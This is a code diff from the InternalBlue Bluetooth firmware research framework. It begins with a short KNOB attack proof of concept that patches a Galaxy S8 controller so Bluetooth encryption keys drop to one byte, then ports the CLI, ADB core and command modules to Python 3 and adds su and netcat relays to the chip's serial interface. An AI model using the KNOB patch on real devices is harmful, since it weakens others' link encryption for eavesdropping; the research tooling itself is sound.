from internalblue.adbcore import ADBCore
"""
This is a standalone PoC for the KNOB attack on a Samsung Galaxy S8.
Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB.
For details see https://github.com/francozappa/knob
This PoC is much shorter since it only modifies global variables for key entropy.
"""
internalblue = ADBCore(serial=True)
internalblue.interface = internalblue.device_list()[0][1] # just use the first device
# setup sockets
if not internalblue.connect():
log.critical("No connection to target device.")
exit(-1)
log.info("Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!")
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x530F6) # connection struct key entropy
internalblue.patchRom(0x530F6, patch)
# modify global variable for own setting
internalblue.writeMem(0x255E8F, '\x01') # global key entropy
internalblue.shutdown()
exit(-1)
log.info("-----------------------\n"
"Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
"Currently, there is no LMP monitoring option on Android 8.\n")
internalblue/__init__.py
+36
View File
@@ -1 +1,37 @@
from future import standard_library
standard_library.install_aliases()
try:
from queue import Queue
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Union, NewType, Callable, Dict
if TYPE_CHECKING:
import datetime
from internalblue.hci import HCI
from internalblue.core import InternalBlue
Address = NewType("Address", int)
Record = Tuple[HCI, int, int, int, Any, datetime.datetime]
FilterFunction = Callable[[Record], bool]
ConnectionNumber = NewType("ConnectionNumber", int)
ConnectionIndex = NewType("ConnectionIndex", int)
BluetoothAddress = NewType("BluetoothAddress", bytes)
ConnectionDict = NewType("ConnectionDict", Dict[str,Any])
HeapInformation = NewType("HeapInformation", Dict[str, Any])
QueueInformation = NewType('QueueInformation', Dict[str, Any])
Opcode = NewType('Opcode', int)
HCI_CMD = NewType('HCI_CMD', int)
Task = Tuple[HCI_CMD, bytes, Queue.Queue, Callable[[Record], bool]]
Device = NewType("Device", Dict[str, Any])
"""{"dev_id": dev_id,
"dev_name": dev_name,
"dev_bdaddr": dev_bdaddr,
"dev_flags": dev_flags,
"dev_flags_str": dev_flags_str}"""
# InternalBlueCore, Device Name, SomeString
DeviceTuple = Tuple[InternalBlue, str, str]
except:
pass
internalblue/adbcore.py
+101 -14
View File
@@ -1,21 +1,27 @@
#!/usr/bin/env python2
from future import standard_library
standard_library.install_aliases()
from builtins import str
import datetime
import socket
import Queue
import queue as queue2k
import random
import hci
from internalblue import hci
from internalblue.utils import bytes_to_hex
from pwn import *
from core import InternalBlue
from .core import InternalBlue
class ADBCore(InternalBlue):
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', data_directory="."):
super(ADBCore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory)
def __init__(self, queue_size=1000, btsnooplog_filename='btsnoop.log', log_level='info', fix_binutils='True', serial=False, data_directory=".", replay=False):
super(ADBCore, self).__init__(queue_size, btsnooplog_filename, log_level, fix_binutils, data_directory, replay)
self.hciport = None # hciport is the port number of the forwarded HCI snoop port (8872). The inject port is at hciport+1
self.serial = serial # use serial su busybox scripting and do not try bluetooth.default.so
self.doublecheck = False
def device_list(self):
"""
@@ -29,6 +35,8 @@ class ADBCore(InternalBlue):
log.warn("Already running. call shutdown() first!")
return []
if self.replay:
return [(self, "adb_replay", 'adb: ReplayDevice' )]
# Check for connected adb devices
try:
adb_devices = adb.devices()
@@ -42,12 +50,12 @@ class ADBCore(InternalBlue):
log.info("No adb devices found.")
return []
# At least one device fonund
# At least one device found
log.info("Found multiple adb devices")
# Enumerate over found devices and put them into an array of tupple
# First index is a self reference of the class
# Scond index is the identifier which is passed to connect()
# Second index is the identifier which is passed to connect()
# Third index is the label which is shown in options(...)
device_list = []
for d in adb_devices:
@@ -65,6 +73,19 @@ class ADBCore(InternalBlue):
context.device = self.interface
# setup sockets
# on magisk-rooted devices there is sometimes already a read socket and this first setup needs to be skipped...
if not self.serial:
if not self._setupSockets():
log.info("Could not connect using Bluetooth module.")
log.info("Trying to set up connection for rooted smartphone with busybox installed.")
else:
return True # successfully finished setup with bluetooth.default.so
if not self._setupSerialSu():
log.critical("Failed to setup scripts for rooted devices.")
return False
# try again
if not self._setupSockets():
log.critical("No connection to target device.")
log.info("Check if:\n -> Bluetooth is active\n -> Bluetooth Stack has Debug Enabled\n -> BT HCI snoop log is activated\n -> USB debugging is authorized\n")
@@ -124,7 +145,7 @@ class ADBCore(InternalBlue):
while(not self.exit_requested and len(record_hdr) < 24):
try:
recv_data = self.s_snoop.recv(24 - len(record_hdr))
log.debug("recvThreadFunc: received bt_snoop data " + recv_data.encode('hex'))
log.debug("recvThreadFunc: received bt_snoop data " + bytes_to_hex(recv_data))
if len(recv_data) == 0:
log.info("recvThreadFunc: bt_snoop socket was closed by remote site. stopping recv thread...")
self.exit_requested = True
@@ -146,7 +167,7 @@ class ADBCore(InternalBlue):
orig_len, inc_len, flags, drops, time64 = struct.unpack( ">IIIIq", record_hdr)
# Read the record data
record_data = b''
record_data = bytearray()
while(not self.exit_requested and len(record_data) < inc_len):
try:
recv_data = self.s_snoop.recv(inc_len - len(record_data))
@@ -154,7 +175,7 @@ class ADBCore(InternalBlue):
log.info("recvThreadFunc: bt_snoop socket was closed by remote site. stopping..")
self.exit_requested = True
break
record_data += recv_data
record_data += bytearray(recv_data)
except socket.timeout:
pass # this is ok. just try again without error
@@ -184,7 +205,7 @@ class ADBCore(InternalBlue):
if filter_function == None or filter_function(record):
try:
queue.put(record, block=False)
except Queue.Full:
except queue.Full:
log.warn("recvThreadFunc: A recv queue is full. dropping packets..")
# Call all callback functions inside registeredHciCallbacks and pass the
@@ -193,9 +214,9 @@ class ADBCore(InternalBlue):
callback(record)
# Check if the stackDumpReceiver has noticed that the chip crashed.
if self.stackDumpReceiver.stack_dump_has_happend:
# if self.stackDumpReceiver and self.stackDumpReceiver.stack_dump_has_happend:
# A stack dump has happend!
log.warn("recvThreadFunc: The controller send a stack dump.")
# log.warn("recvThreadFunc: The controller sent a stack dump.")
# self.exit_requested = True
log.debug("Receive Thread terminated.")
@@ -212,7 +233,7 @@ class ADBCore(InternalBlue):
# (with multiple attached Android devices) we must not hard code the
# forwarded port numbers. Therefore we choose the port numbers
# randomly and hope that they are not already in use.
self.hciport = random.randint(60000, 65535)
self.hciport = random.randint(60000, 65534) # minus 1, as we are using hciport + 1
log.debug("_setupSockets: Selected random ports snoop=%d and inject=%d" % (self.hciport, self.hciport + 1))
# Forward ports 8872 and 8873. Ignore log.info() outputs by the adb function.
@@ -247,8 +268,10 @@ class ADBCore(InternalBlue):
self.s_inject.close()
self.s_snoop.close()
self.s_inject = self.s_snoop = None
context.log_level = 'warn'
adb.adb(["forward", "--remove", "tcp:%d" % (self.hciport)])
adb.adb(["forward", "--remove", "tcp:%d" % (self.hciport + 1)])
context.log_level = saved_loglevel
return False
return True
@@ -274,3 +297,67 @@ class ADBCore(InternalBlue):
return False
finally:
context.log_level = saved_loglevel
def _setupSerialSu(self):
"""
To run on any rooted device, we can also use some shellscripting.
This is slower but at least works on any device.
Commands on a S10e with Samsung Stock ROM + Magisk + busybox:
tail -f -n +0 /data/log/bt/btsnoop_hci.log | nc -l -p 8872
nc -l -p 8873 >/sdcard/internalblue_input.bin
tail -f /sdcard/internalblue_input.bin >>/dev/ttySAC1
Locations of the Bluetooth serial interface and btsnoop log file might differ.
The second part *could* be combined, but it somehow does not work (SELinux?).
The ADB Python bindings will kill the processes automatically :)
"""
# In sending direction, the format is different.
self.serial = True
saved_loglevel = context.log_level
context.log_level = 'warn'
try:
# check dependencies
if adb.which('su') is None:
log.critical("su not found, rooted smartphone required!")
return False
if adb.process(['su', '-c', 'which', 'nc']).recvall() == '':
log.critical("nc not found, install busybox!")
return False
# automatically detect the proper serial device with lsof
logfile = adb.process(["su", "-c", "lsof | grep btsnoop_hci.log | awk '{print $NF}'"]).recvall().strip()
log.info("Android btsnoop logfile %s...", logfile)
interface = adb.process(["su", "-c", "lsof | grep bluetooth | grep tty | awk '{print $NF}'"]).recvall().strip()
log.info("Android Bluetooth interface %s...", interface)
if logfile == '':
log.critical("Could not find Bluetooth logfile. Enable Bluetooth snoop logging.")
return False
if interface == '':
log.critical("Could not find Bluetooth interface. Enable Bluetooth.")
return False
# spawn processes
adb.process(["su", "-c", 'tail -f -n +0 %s | nc -l -p 8872' % logfile])
adb.process(["su", "-c", "nc -l -p 8873 >/sdcard/internalblue_input.bin"])
adb.process(["su", "-c", "tail -f /sdcard/internalblue_input.bin >>%s" % interface])
sleep(2)
except PwnlibException as e:
log.warn("Serial scripting setup failed: " + str(e))
return False
finally:
context.log_level = saved_loglevel
return True
internalblue/cli.py
+124 -28
View File
@@ -28,16 +28,27 @@
# Software.
from __future__ import print_function
from builtins import str
from pwn import *
import os
import traceback
import argparse
from adbcore import ADBCore
from hcicore import HCICore
from ioscore import iOSCore
from .adbcore import ADBCore
from .hcicore import HCICore
from sys import platform
import cmds
from . import cmds
try:
import typing
from typing import List, Optional
from internalblue.core import InternalBlue
from . import DeviceTuple
except:
pass
HISTFILE = "_internalblue.hist"
@@ -53,11 +64,15 @@ type <help> for usage information!\n\n"""
for line in banner:
term.output(text.blue(line))
def commandLoop(internalblue):
def commandLoop(internalblue, init_commands=None):
cmdstack = init_commands.split(';')[::-1] if init_commands else None
while internalblue.running and not internalblue.exit_requested:
cmd_instance = None
try:
cmdline = term.readline.readline(prompt='> ').strip()
if cmdstack:
cmdline = cmdstack.pop().strip()
else:
cmdline = term.readline.readline(prompt='> ').strip().decode('utf-8')
cmdword = cmdline.split(' ')[0].split('=')[0]
if(cmdword == ''):
continue
@@ -67,12 +82,11 @@ def commandLoop(internalblue):
log.warn("Command unknown: " + cmdline)
continue
cmd_instance = matching_cmd(cmdline, internalblue)
if(not cmd_instance.work()):
log.warn("Command failed: " + str(cmd_instance))
except ValueError as e:
log.warn("commandLoop: ValueError: " + str(e))
continue
raise
except KeyboardInterrupt:
if(cmd_instance != None):
cmd_instance.abort_cmd()
@@ -80,25 +94,42 @@ def commandLoop(internalblue):
log.info("Got Ctrl-C; exiting...")
internalblue.exit_requested = True
break
except AssertionError as e:
raise
except socket.error as e:
if e.args == (1, "Operation not permitted"):
log.critical("Received an 'Operation not permitted' socket.error, you might need root for the command '{}'".format(cmdline))
log.critical(traceback.format_exc())
except Exception as e:
internalblue.exit_requested = True # Make sure all threads terminate
log.critical("Uncaught exception (%s). Abort." % str(e))
print(traceback.format_exc())
break
raise
cmd_instance = None
# Main Program Start
def internalblue_cli():
print_banner()
def _parse_argv(argv):
parser = argparse.ArgumentParser()
parser.add_argument("--data-directory", "-d", help="Set data directory. Default: ~/.internalblue")
parser.add_argument("--verbose", "-v", help="Set log level to DEBUG", action="store_true")
parser.add_argument("--ios-device", "-i", help="Tell internalblue to connect to a remote iPhone HCI socket. Specify socket IP address and port")
args = parser.parse_args()
parser.add_argument("--ios-device", "-i", help="Tell internalblue to connect to a remote iPhone HCI socket. Specify socket IP address and port (i.e., 172.20.10.1:1234).")
parser.add_argument("--serialsu", "-s", help="On ADB, directly try su/serial/busybox scripting, if you do not have a special bluetooth.default.so file.", action="store_true")
parser.add_argument("--testdevice", "-t", help="Use a dummy test device to execute testcases", action="store_true")
parser.add_argument("--trace", help="Trace hci connection")
parser.add_argument("--device", help="Specify device/core to be used")
parser.add_argument("--commands", "-c", help="CLI command to run before prompting, seperated by ';' (used for easier testing)")
parser.add_argument("--replay", help="Intercept and replace every communication with the core with the one in the specified file")
parser.add_argument("--save", help="Store a trace into the file that can be used with --replay")
return parser.parse_args(argv)
if args.data_directory != None:
# Main Program Start
def internalblue_cli(argv, args=None):
#print_banner()
args = args or _parse_argv(argv)
if args.data_directory is not None:
data_directory = args.data_directory
else:
data_directory = os.path.expanduser("~") + "/.internalblue"
@@ -118,21 +149,84 @@ def internalblue_cli():
readline_completer = term.completer.LongestPrefixCompleter(words=cmd_keywords)
term.readline.set_completer(readline_completer)
if args.trace:
from .socket_hooks import hook
from internalblue import socket_hooks
HookClass = getattr(socket_hooks, args.trace)
hook(HCICore, HookClass)
hook(ADBCore, HookClass)
elif args.save:
from .socket_hooks import hook, TraceToFileHook
hook(HCICore, TraceToFileHook, filename=args.save)
hook(ADBCore, TraceToFileHook, filename=args.save)
# Initalize cores and get devices
if args.ios_device:
connection_methods = [iOSCore(args.ios_device, log_level=log_level,
data_directory=data_directory)]
# As macOS has additional dependencies (objc), only import it here if needed
connection_methods = [] # type: List[InternalBlue]
if args.replay:
from .socket_hooks import hook, ReplaySocket
from .macoscore import macOSCore
replay_devices = ['macos_replay', 'adb_replay', 'hci_replay', 'ios_replay']
if args.device == "macos_replay":
from .macoscore import macOSCore
hook(macOSCore, ReplaySocket, filename=args.replay)
connection_methods = [macOSCore(log_level=log_level, data_directory=data_directory, replay=True)]
elif args.device == "hci_replay":
hook(HCICore, ReplaySocket, filename=args.replay)
connection_methods = [HCICore(log_level=log_level, data_directory=data_directory, replay=True)]
elif args.device == "adb_replay":
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level=log_level, data_directory=data_directory, replay=True)]
elif args.device == "ios_replay":
raise NotImplementedError("ios replay is not implemented yet")
else:
raise ValueError("--device is required with --replay and has to be one of {}".format(replay_devices))
elif args.ios_device:
from .ioscore import iOSCore
connection_methods = [iOSCore(args.ios_device, log_level=log_level, data_directory=data_directory)]
elif args.testdevice:
from .testcore import testCore
connection_methods = [testCore(log_level=log_level, data_directory=data_directory)]
elif platform == "darwin":
from .macoscore import macOSCore
connection_methods = [
macOSCore(log_level=log_level, data_directory=data_directory, replay=(args.replay and args.device == 'mac')),
ADBCore(log_level=log_level, data_directory=data_directory)]
if args.trace:
hook(macOSCore, HookClass)
elif args.save:
hook(macOSCore, TraceToFileHook, filename=args.save)
else:
connection_methods = [
ADBCore(log_level=log_level, data_directory=data_directory),
ADBCore(log_level=log_level, data_directory=data_directory, serial=args.serialsu),
HCICore(log_level=log_level, data_directory=data_directory)]
devices = []
devices = [] # type: List[DeviceTuple]
for connection_method in connection_methods:
devices.extend(connection_method.device_list())
device = None # type: Optional[DeviceTuple]
if len(devices) > 0:
if len(devices) == 1:
if args.replay:
# There should only be one device that was created when --replay was passed
device = devices[0]
elif args.device:
matching_devices = [ dev for dev in devices if dev[1] == args.device]
if len(matching_devices) > 1:
log.critical("Found multiple matching devices")
exit(-1)
elif len(matching_devices) == 1:
log.info("Found device is: {}".format(matching_devices[0]))
device = matching_devices[0]
else:
log.critical("No matching devices found")
exit(-1)
elif len(devices) == 1:
device = devices[0]
else:
i = options('Please specify device:', [d[2] for d in devices], 0)
@@ -145,7 +239,7 @@ def internalblue_cli():
# Restore readline history:
if os.path.exists(reference.data_directory + "/" + HISTFILE):
readline_history = read(reference.data_directory + "/" + HISTFILE)
term.readline.history = readline_history.split('\n')
term.readline.history = readline_history.split(b'\n')
# Connect to device
if not reference.connect():
@@ -153,20 +247,22 @@ def internalblue_cli():
exit(-1)
# Enter command loop (runs until user quits)
commandLoop(reference)
log.info("Starting commandLoop for reference {}".format(reference))
commandLoop(reference, init_commands=args.commands)
# shutdown connection
reference.shutdown()
# Save readline history:
f = open(reference.data_directory + "/" + HISTFILE, "w")
f.write("\n".join(term.readline.history))
f.close()
# TODO: - This causes issues, have to fix ASAP
# f = open(reference.data_directory + "/" + HISTFILE, "w")
# f.write("\n".join(term.readline.history))
# f.close()
# Cleanup
log.info("Goodbye")
if __name__ == "__main__":
internalblue_cli()
internalblue_cli(sys.argv[1:])
internalblue/cmds.py
+153 -54
View File
@@ -23,6 +23,11 @@
# out of or in connection with the Software or the use or other dealings in the
# Software.
from __future__ import print_function
from builtins import str
from builtins import hex
from builtins import range
from builtins import object
from pwn import *
import os
import sys
@@ -35,8 +40,24 @@ import struct
import time
import select
import json
from internalblue.utils import bytes_to_hex
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple, Type
if TYPE_CHECKING:
from internalblue.core import InternalBlue
from internalblue.hci import HCI
from internalblue import Record, BluetoothAddress, Address
except:
pass
def getCmdList():
# type: () -> List[Type['Cmd']]
""" Returns a list of all commands which are defined in this cmds.py file.
This is done by searching for all subclasses of Cmd
"""
@@ -44,6 +65,7 @@ def getCmdList():
if inspect.isclass(obj) and issubclass(obj, Cmd)][1:]
def findCmd(keyword):
# type: (str) -> Optional[Type['Cmd']]
""" Find and return a Cmd subclass for a given keyword.
"""
command_list = getCmdList()
@@ -61,11 +83,13 @@ def auto_int(x):
return int(x, 0)
def bt_addr_to_str(bt_addr):
# type: (BluetoothAddress) -> str
""" Convert a Bluetooth address (6 bytes) into a human readable format.
"""
return ":".join([b.encode("hex") for b in bt_addr])
return ":".join(format(x, '02x') for x in bytearray(bt_addr))
def parse_bt_addr(bt_addr):
# type: (Any) -> Optional[BluetoothAddress]
""" Convert Bluetooth address argument and check lengths.
"""
addr = bt_addr
@@ -86,17 +110,18 @@ def parse_bt_addr(bt_addr):
return addr
class Cmd:
class Cmd(object):
""" This class is the superclass of a CLI command. Every CLI command
must be defined as subclass of Cmd. The subclass must define the
'keywords' list as member variable. The actual implementation of the
command should be located in the work() method.
"""
keywords = []
keywords = [] # type: List[str]
memory_image = None
memory_image = None # type: Optional[bytes]
def __init__(self, cmdline, internalblue):
# type: (str, InternalBlue) -> None
self.cmdline = cmdline
self.internalblue = internalblue
self.memory_image_template_filename = internalblue.data_directory + "/memdump__template.bin"
@@ -105,23 +130,28 @@ class Cmd:
self.internalblue.fw.__name__[6:12] + "_template.bin"
def __str__(self):
# type: () -> str
return self.cmdline
def work(self):
# type: () -> bool
return True
def abort_cmd(self):
# type: () -> None
self.aborted = True
if hasattr(self, 'progress_log'):
self.progress_log.failure("Command aborted")
def getArgs(self):
# type: () -> Any
try:
return self.parser.parse_args(self.cmdline.split(' ')[1:])
except SystemExit:
return None
def isAddressInSections(self, address, length=0, sectiontype=""):
# type: (int, int, str) -> bool
if not self.internalblue.fw:
return False
@@ -137,12 +167,15 @@ class Cmd:
return False
def readMem(self, address, length, progress_log=None, bytes_done=0, bytes_total=0):
# type: (Address, int, Optional[Any], int, int) -> Optional[bytes]
return self.internalblue.readMem(address, length, progress_log, bytes_done, bytes_total)
def writeMem(self, address, data, progress_log=None, bytes_done=0, bytes_total=0):
# type: (Address, bytes, Optional[Any], int, int) -> bool
return self.internalblue.writeMem(address, data, progress_log, bytes_done, bytes_total)
def initMemoryImage(self):
# type: () -> None
"""
Initially read out a chip's memory, all sections (RAM+ROM).
:return:
@@ -168,6 +201,7 @@ class Cmd:
self.refreshMemoryImage()
def refreshMemoryImage(self):
# type: () -> None
"""
Update an existing memory dump, only RAM sections.
:return:
@@ -178,11 +212,13 @@ class Cmd:
for section in self.internalblue.fw.SECTIONS:
if not section.is_rom:
sectiondump = self.readMem(section.start_addr, section.size(), self.progress_log, bytes_done, bytes_total)
Cmd.memory_image = Cmd.memory_image[0:section.start_addr] + sectiondump + Cmd.memory_image[section.end_addr:]
bytes_done += section.size()
if sectiondump and Cmd.memory_image:
Cmd.memory_image = Cmd.memory_image[0:section.start_addr] + sectiondump + Cmd.memory_image[section.end_addr:]
bytes_done += section.size()
self.progress_log.success("Received Data: complete")
def getMemoryImage(self, refresh=False):
# type: (bool) -> Any
if Cmd.memory_image is None:
self.initMemoryImage()
elif refresh:
@@ -253,7 +289,8 @@ class CmdLogLevel(Cmd):
log_levels = ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
for keyword in list(keywords):
keywords.extend(['%s %s' % (keyword, log_level) for log_level in log_levels])
for log_level in log_levels:
keywords.append('%s %s' % (keyword, log_level))
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
@@ -285,7 +322,7 @@ class CmdMonitor(Cmd):
parser.add_argument("command",
help="One of: start, stop, kill")
class MonitorController:
class MonitorController(object):
instance = None
@staticmethod
@@ -295,7 +332,7 @@ class CmdMonitor(Cmd):
CmdMonitor.MonitorController.instance = CmdMonitor.MonitorController.__MonitorController(internalblue, 0xC9)
return CmdMonitor.MonitorController.instance
class __MonitorController:
class __MonitorController(object):
def __init__(self, internalblue, pcap_data_link_type):
self.internalblue = internalblue
self.running = False
@@ -410,6 +447,7 @@ class CmdMonitor(Cmd):
self.wireshark_process = None
def adbhciCallback(self, record):
# type: (Record) -> None
hcipkt, orig_len, inc_len, flags, drops, recvtime = record
dummy = "\x00\x00\x00" # TODO: Figure out purpose of these fields
@@ -502,6 +540,7 @@ class CmdDumpMem(Cmd):
help="Only dump the two RAM sections.")
parser.add_argument("--file", "-f", default="memdump.bin",
help="Filename of memory dump (default: %(default)s)")
parser.add_argument("--overwrite", action='store_true')
def work(self):
args = self.getArgs()
@@ -513,10 +552,10 @@ class CmdDumpMem(Cmd):
bytes_total = sum([s.size() for s in self.internalblue.fw.SECTIONS if s.is_ram])
bytes_done = 0
self.progress_log = log.progress("Downloading RAM sections...")
for section in filter(lambda s: s.is_ram, self.internalblue.fw.SECTIONS):
for section in [s for s in self.internalblue.fw.SECTIONS if s.is_ram]:
filename = args.file + "_" + hex(section.start_addr)
if os.path.exists(filename):
if not yesno("Update '%s'?" % filename):
if not (args.overwrite or yesno("Update '%s'?" % filename)):
log.info("Skipping section @%s" % hex(section.start_addr))
bytes_done += section.size()
continue
@@ -530,7 +569,7 @@ class CmdDumpMem(Cmd):
# Get complete memory image
if os.path.exists(args.file):
if not yesno("Update '%s'?" % os.path.abspath(args.file)):
if not (args.overwrite or yesno("Update '%s'?" % os.path.abspath(args.file))):
return False
dump = self.getMemoryImage(refresh=not args.norefresh)
@@ -566,10 +605,10 @@ class CmdSearchMem(Cmd):
highlight = pattern
if args.hex:
try:
pattern = pattern.decode('hex')
pattern = bytearray.fromhex(pattern)
highlight = pattern
except TypeError as e:
log.warn("Search pattern cannot be converted to hexstring: " + str(e))
log.warn("Search pattern cannot be converted to bytestring: " + str(e))
return False
elif args.address:
pattern = p32(int(pattern, 16))
@@ -618,7 +657,7 @@ class CmdHexdump(Cmd):
if dump == None:
return False
log.hexdump(dump, begin=args.address)
log.hexdump(bytes(dump), begin=args.address)
return True
class CmdTelescope(Cmd):
@@ -733,9 +772,9 @@ class CmdWriteMem(Cmd):
data = ' '.join(args.data)
if args.hex:
try:
data = data.decode('hex')
data = bytearray.fromhex(data)
except TypeError as e:
log.warn("Data string cannot be converted to hexstring: " + str(e))
log.warn("Hex string cannot be converted to bytestring: " + str(e))
return False
elif args.int:
data = p32(auto_int(data))
@@ -918,14 +957,14 @@ class CmdSendHciCmd(Cmd):
log.info("cmdcode needs to be in the range of 0x0000 - 0xffff")
return False
data = ''
data = b''
for data_part in args.data:
if data_part[0:2] == "0x":
data += p32(auto_int(data_part))
else:
data += data_part.decode('hex')
self.internalblue.sendHciCommand(args.cmdcode, data)
return self.internalblue.sendHciCommand(args.cmdcode, data)
return True
@@ -956,8 +995,8 @@ class CmdPatch(Cmd):
return True
if args.slot != None:
if args.slot < 0 or args.slot > 128:
log.warn("Slot has to be in the range 0 to 128!")
if args.slot < 0 or args.slot > self.internalblue.fw.PATCHRAM_NUMBER_OF_SLOTS:
log.warn("Slot has to be in the range 0 to %i!" % self.internalblue.fw.PATCHRAM_NUMBER_OF_SLOTS)
return False
# Patch Deletion
@@ -1040,9 +1079,9 @@ class CmdSendLmp(Cmd):
connection = self.internalblue.readConnectionInformation(i+1)
if connection == None:
continue
if connection["connection_handle"] != 0 and connection["remote_address"] != b'\x00\x00\x00\x00\x00\x00':
args.conn_handle = connection["connection_handle"]
is_master = connection["master_of_connection"]
if connection.connection_handle != 0 and connection.remote_address != b'\x00\x00\x00\x00\x00\x00':
args.conn_handle = connection.connection_handle
is_master = connection.master_of_connection
break
# if still not set, typical connection handles seem to be 0x0b...0x0d
@@ -1080,6 +1119,37 @@ class CmdFuzzLmp(Cmd):
return self.internalblue.fuzzLmp()
class CmdSendLcp(Cmd):
keywords = ['sendlcp']
description = "Send LCP packet to another device."
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
epilog="Aliases: " + ", ".join(keywords))
parser.add_argument("--conn_index", "-c", type=auto_int,
help="Connection index, starts at 0 for first connection.")
parser.add_argument("data",
help="Payload as hexstring.")
def work(self):
args = self.getArgs()
if not args:
return True
# if not set, just use 0
if not args.conn_index:
args.conn_index = 0
try:
data = args.data.decode('hex')
except TypeError as e:
log.warn("Data string cannot be converted to hexstring: " + str(e))
return False
log.info("Sending data=%s to connection index=0x%04x" %
(data.encode('hex'), args.conn_index))
return self.internalblue.sendLcpPacket(args.conn_index, data)
class CmdInfo(Cmd):
keywords = ['info', 'show', 'i']
description = "Display various types of information parsed from live RAM"
@@ -1112,21 +1182,21 @@ class CmdInfo(Cmd):
continue
log.info("### | Connection ---%02d--- ###" % i)
log.info(" - Number: %d" % connection["connection_number"])
log.info(" - Remote BT address: %s" % bt_addr_to_str(connection["remote_address"]))
log.info(" - Remote BT name: %08X" % connection["remote_name_address"])
log.info(" - Master of Conn.: %s" % str(connection["master_of_connection"]))
log.info(" - Conn. Handle: 0x%X" % connection["connection_handle"])
log.info(" - Public RAND: %s" % connection["public_rand"].encode('hex'))
#log.info(" - PIN: %s" % connection["pin"].encode('hex'))
#log.info(" - BT addr for key: %s" % bt_addr_to_str(connection["bt_addr_for_key"]))
log.info(" - Effective Key Len: %d byte (%d bit)" % (connection["effective_key_len"], 8*connection["effective_key_len"]))
log.info(" - Link Key: %s" % connection["link_key"].encode('hex'))
log.info(" - LMP Features: %s" % connection["extended_lmp_feat"].encode('hex'))
log.info(" - Host Supported F: %s" % connection["host_supported_feat"].encode('hex'))
log.info(" - TX Power (dBm): %d" % connection["tx_pwr_lvl_dBm"])
log.info(" - Array Index: %s" % connection["id"].encode('hex'))
print
log.info(" - Number: %d" % connection.connection_number)
log.info(" - Remote BT address: %s" % bt_addr_to_str(connection.remote_address))
log.info(" - Remote BT name: %08X" % connection.remote_name_address)
log.info(" - Master of Conn.: %s" % str(connection.master_of_connection))
log.info(" - Conn. Handle: 0x%X" % connection.connection_handle)
log.info(" - Public RAND: %s" % bytes_to_hex(connection.public_rand))
#log.info(" - PIN: %s" % bytes_to_hex(connection.pin)
#log.info(" - BT addr for key: %s" % bt_addr_to_str(connection.bt_addr_for_key))
log.info(" - Effective Key Len: %d byte (%d bit)" % (connection.effective_key_len, 8*connection["effective_key_len"]))
log.info(" - Link Key: %s" % bytes_to_hex(connection.link_key))
log.info(" - LMP Features: %s" % bytes_to_hex(connection.extended_lmp_feat))
log.info(" - Host Supported F: %s" % bytes_to_hex(connection.host_supported_feat))
log.info(" - TX Power (dBm): %d" % connection.tx_pwr_lvl_dBm)
log.info(" - Array Index: %s" % bytes_to_hex(connection.id))
print()
return True
def infoDevice(self, args):
@@ -1135,14 +1205,14 @@ class CmdInfo(Cmd):
log.warn(" '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const)
return False
bt_addr = self.readMem(self.internalblue.fw.BD_ADDR, 6)[::-1]
bt_addr_str = ":".join([b.encode("hex") for b in bt_addr])
bt_addr_str = bt_addr_to_str(bt_addr)
device_name = self.readMem(self.internalblue.fw.DEVICE_NAME, 258)
device_name_len = u8(device_name[0])-1
device_name_len = device_name[0]-1
device_name = device_name[2:2+device_name_len]
adb_serial = context.device
log.info("### | Device ###")
log.info(" - Name: %s" % device_name)
log.info(" - Name: %s" % device_name.decode('utf-8'))
log.info(" - ADB Serial: %s" % adb_serial)
log.info(" - Address: %s" % bt_addr_str)
return True
@@ -1164,7 +1234,7 @@ class CmdInfo(Cmd):
code = disasm(table_values[i],vma=table_addresses[i],byte=False,offset=False)
code = code.replace(" ", " ").replace("\n", "; ")
log.info("[%03d] 0x%08X: %s (%s)" % (i, table_addresses[i],
table_values[i].encode('hex'),
bytes_to_hex(table_values[i]),
code))
return True
@@ -1242,7 +1312,7 @@ class CmdInfo(Cmd):
# Print Buffer Details
buffer_size = bloc_for_details["buffer_size"] + 4
for buffer_address, buffer_hdr in bloc_for_details["buffer_headers"].iteritems():
for buffer_address, buffer_hdr in bloc_for_details["buffer_headers"].items():
progress_log.status("Dumping buffers from BLOC[%d]: 0x%06X" % (bloc_for_details["index"], buffer_address))
# Buffer in use!
if buffer_hdr == bloc_for_details["address"]:
@@ -1264,7 +1334,7 @@ class CmdInfo(Cmd):
log.info("[ Idx ] @Queue-Addr Queue-Name Items/Free/Capacity Item-Size Buffer")
log.info("------------------------------------------------------------______--------------")
for queue in queuelist:
for queue in [vars(element) for element in queuelist]:
# TODO: waitlist
log.info(("QUEU[{index:2d}] @ 0x{address:06X}: {name:21s} {available_items:2d} /"
" {free_slots:2d} / {capacity:2d} {item_size:2d} Bytes 0x{queue_buf_start:06X}").format(**queue))
@@ -1298,7 +1368,7 @@ class CmdInfo(Cmd):
if args.type in subcommands:
return subcommands[args.type](args.args)
else:
log.warn("Unkown type: %s\nKnown types: %s" % (args.type, subcommands.keys()))
log.warn("Unkown type: %s\nKnown types: %s" % (args.type, list(subcommands.keys())))
return False
@@ -1347,6 +1417,26 @@ class CmdTracepoint(Cmd):
return True
class CmdBreakpoint(Cmd):
keywords = ['break', 'breakpoint', 'bp']
description = "Add breakpoint. This will crash, but produces a stackdump at the given address."
parser = argparse.ArgumentParser(prog=keywords[0],
description=description,
epilog="Aliases: " + ", ".join(keywords))
parser.add_argument("address", type=auto_int, nargs="?",
help="Address of the breakpoint")
def work(self):
args = self.getArgs()
if args == None:
return True
log.info("Inserting breakpoint at 0x%x..." % args.address)
self.internalblue.patchRom(args.address, "\x00\xbe\x00\x00")
return True
class CmdConnectCmd(Cmd):
keywords = ['connect', 'c']
description = "Initiate a connection to a remote Bluetooth device"
@@ -1402,7 +1492,8 @@ class CmdCustom(Cmd):
